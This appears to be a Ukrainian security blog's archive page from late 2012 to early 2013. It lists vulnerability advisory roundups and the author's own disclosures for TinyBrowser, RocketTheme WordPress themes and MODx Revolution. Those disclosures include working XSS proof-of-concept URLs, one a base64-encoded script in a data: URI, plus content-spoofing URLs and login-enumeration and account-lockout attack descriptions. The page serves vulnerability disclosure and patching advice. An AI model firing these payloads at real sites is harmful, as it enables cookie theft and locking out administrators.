Архів для категорії 'Уразливості'

Добірка уразливостей

17:26 10.01.2013

В даній добірці уразливості в веб додатках:

  • EMC NetWorker Format String Vulnerability (деталі)
  • Multiple SQL Injection Vulnerabilities in Elite Bulletin Board (деталі)
  • Multiple vulnerabilities in Banana Dance (деталі)
  • Symantec Messaging Gateway SSH with backdoor user account (деталі)
  • Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability (деталі)
  • mahara security update (деталі)
  • Symantec Messaging Gateway - Support Backdoor (деталі)
  • MoinMoin vulnerabilities (деталі)
  • mediawiki-extensions security update (деталі)
  • Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability (деталі)

Уразливості в плагінах для WordPress №86

23:57 09.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Simple Gmail Login, List Communities та ArribaLaEsteban. Для котрих з’явилися експлоіти. Simple Gmail Login - це плагін для аутентифікації через логін і пароль до Gmail, List Communities - це плагін для створення спільнот, ArribaLaEsteban - це тема движка.

  • Wordpress Plugin Simple Gmail Login Stack Trace Vulnerability (деталі)
  • WordPress List Communities SQL Injection (деталі)
  • WordPress ArribaLaEsteban SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в TinyBrowser

23:54 08.01.2013

У грудні, 28.12.2012, я знайшов численні уразливості в TinyBrowser для TinyMCE. Це Information Leakage, Full path disclosure та Cross-Site Scripting уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про Виконання коду в TinyBrowser.

Information Leakage (Directory Listing) (WASC-13):

http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=

http://site/tiny_mce/plugins/tinybrowser/edit.php?type=

Виводиться зміст коренової директорії сайта, якщо немає директорії для завантаження.

Full path disclosure (WASC-13):

В tinybrowser.php і edit.php виводиться FPD якщо немає папки для завантаження.

Якщо завантажити скрипт з розширенням зображення, то також випадають FPD.

XSS (WASC-08):

http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//

Для IE:

http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))

Уразливі старі версії TinyBrowser (такі як 1.33 та попередні версії). В версії TinyBrowser 1.42 дані уразливості вже виправлені.

Добірка уразливостей

17:24 08.01.2013

В даній добірці уразливості в веб додатках:

  • (0Day) HP Operations Orchestration RSScheduler Service JDBC Connector Remote Code Execution Vulnerability (деталі)
  • SimpleInvoices 2011.1 Cross-Site-Scripting (XSS) Vulnerabilities (деталі)
  • Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework (деталі)
  • Dr. Web Control Center Admin UI Remote Script Code Injection (деталі)
  • Path Traversal Vulnerability on Secure Transport versions 5.1 SP2 and earlier (деталі)
  • FCKEditor File Upload Vulnerability (деталі)
  • OpenStack Keystone vulnerabilities (деталі)
  • File Upload Concern in Front Account 2.3.13 and OpenDocMan 1.2.6.2 (деталі)
  • OpenDocMan 1.2.6.2 - 3 Vulnerabilities (деталі)
  • Addressbook v8.1.24.1 Group Name XSS (деталі)

Нові уразливості на portal.rada.gov.ua

16:28 31.12.2012

12.07.2012

Сьогодні я знайшов Cross-Site Scripting уразливості на http://portal.rada.gov.ua - сайті Верховної Ради України. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже неодноразово писав про дірки на сайті Парламенту. В останнє - коли писав про уразливості на kmu.gov.ua, rada.gov.ua та president.gov.ua, а також я неодноразово писав про дірки та взломи на різних піддоменах rada.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

31.12.2012

XSS:

Дані уразливості досі не виправлені.

Уразливості в плагінах для WordPress №85

23:57 29.12.2012

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Facebook Survey, FireStorm Real Estate та Madebymilk. Для котрих з’явилися експлоіти. Facebook Survey - це плагін для проведення опитування на FB, FireStorm Real Estate - це плагін для розміщення списків нерухомості, Madebymilk - це тема движка.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в нових темах для WordPress

23:55 28.12.2012

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, Moxy, Terrantribune, Meridian є ще інші уразливі теми (шаблони).

Я написав про 16 їхніх тем (серед яких було два різновиди двох тем), а всього у них 47 тем для WordPress. З них лише три безкоштовні, а всі інші теми від RocketTheme є платними (потрібно купити підписку в “клуб”, щоб отримати до них доступ). І Rokbox постачається з усіма цими темами, окрім Grunge, які мають всі раніше згадані уразливості.

В цих 32 темах, як і попередніх 16 (14 тем + 2 різновиди), мають місце Cross-Site Scripting, Content Spoofing, Full path disclosure та Information Leakage уразливості. Про що вже повідомив розробникам цих тем. Це наступні шаблони від RocketTheme: Voxel, Diametric, Ionosphere, Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex, Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox, Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline, Kinetic, Dominion, Reaction, Akiraka, Novus. А також шаблон Grunge має FPD дірки.

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Full path disclosure (WASC-13):

У всіх цих темах є FPD в index.php (http://site/wordpress/wp-content/themes/rt_novus_wp/ і так само для інших тем), що спрацьовує при налаштуваннях PHP по замовчуванню. Також FPD потенційно є в інших php-файлах цих тем.

Information Leakage (WASC-13):

В деяких темах, подібно до rt_mixxmag_wp, може бути розміщений error log з FPD.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Уразливі всі версії всіх вищенаведених тем для WordPress.

Численні уразливості в MODx Revolution

20:11 27.12.2012

26.07.2012

У липні, 04.07.2012, я виявив численні уразливості в системі MODX Revolution, зокрема Brute Force, Cross-Site Request Forgery, Abuse of Functionality та Insufficient Anti-automation. Які виявив на сайті www.gov.ua. Частково уразливості збігаються з MODx 1.0.х. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в MODx.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

27.12.2012

Brute Force (WASC-11):

В формі логіна (http://site/manager/) немає захисту від Brute Force атак.

Cross-Site Request Forgery (WASC-09):

Відсутність захисту від Brute Force (такого як капча) в формі логіна (http://site/manager/) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта). Це також може бути використано для автоматизованого входу в акаунт, фішинга та інших автоматизованих атак.

Abuse of Functionality (WASC-42):

В формі логіна (http://site/manager/) можна виявляти логіни користувачів (Login Enumeration). Різні повідомлення виводяться для коректних і некоректних логінів.

Insufficient Anti-automation (WASC-21):

Із-за відсутності захисту від автоматизованих атак в формі логіна, окрім Brute Force атак також можливі автоматизовані атаки на функції логіна (для автоматизованого виявлення логінів) та відновлення паролю (для виявлення емайлів користувачів). Обидва функціонали знаходяться на одній сторінці.

Уразливі всі весії MODx Revolution (2.x версії движка). Дані уразливості досі не виправлені розробниками. XSS дірки з www.gov.ua не відносяться до CMS - це власний код цього сайта.

31.12.2012

При включеному блокуванні на сайті з’являються дві нові уразливості (аналогічні діркам в MODx Evolution).

Abuse of Functionality (Login Enumeration) (WASC-42):

В формі логіна (http://site/manager/) можливий підбір логінів. Якщо блокування не спрацьовує після трьох запитів (як може бути встановлене на сайті), значить немає такого логіна в системі, тобто воно спрацьовує лише для робочих логінів. Атака можлива, якщо включене блокування.

Експлоіт:

MODx Revolution Abuse of Functionality-1.html

Abuse of Functionality (WASC-42):

Після знаходження логіна з вищезгаданою уразливістю можливе зловживання блокуванням акаунтів. Після трьох запитів (як може бути встановлене на сайті) акаунт може бути заблокований (навіть акаунт адміна). Постійно посилаючи запити до цього функціоналу (по три некоректні запити), можна постійно тримати акаунт заблокованим (в тому числі адмінський).

Експлоіт:

MODx Revolution Abuse of Functionality-2.html

Уразливості в плагінах для WordPress №84

23:54 26.12.2012

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Portable phpMyAdmin, Plg Novana та Magazine Basic. Для котрих з’явилися експлоіти. Portable phpMyAdmin - це плагін для доступу в phpMyAdmin з адмінки WP, Plg Novana - це спеціальний плагін, Magazine Basic - це тема движка.

  • portable-phpMyAdmin (WordPress Plugin) Authentication Bypass (деталі)
  • WordPress Plg Novana SQL Injection (деталі)
  • WordPress Magazine Basic SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:28 26.12.2012

В даній добірці уразливості в веб додатках:

  • (0Day) HP Intelligent Management Center img.exe Integer Wrap Remote Code Execution Vulnerability (деталі)
  • Multiple vulnerabilities in dotProject (деталі)
  • ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities (деталі)
  • Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilites (деталі)
  • (0Day) HP LeftHand Virtual SAN Appliance Unauthenticated Access Remote Command Execution Vulnerability (деталі)
  • tinymcpuk xss vulnerability (деталі)
  • Multiple vulnerabilities in Achievo (деталі)
  • SQL injection in FOOT Gestion (деталі)
  • Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities (деталі)
  • Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability (деталі)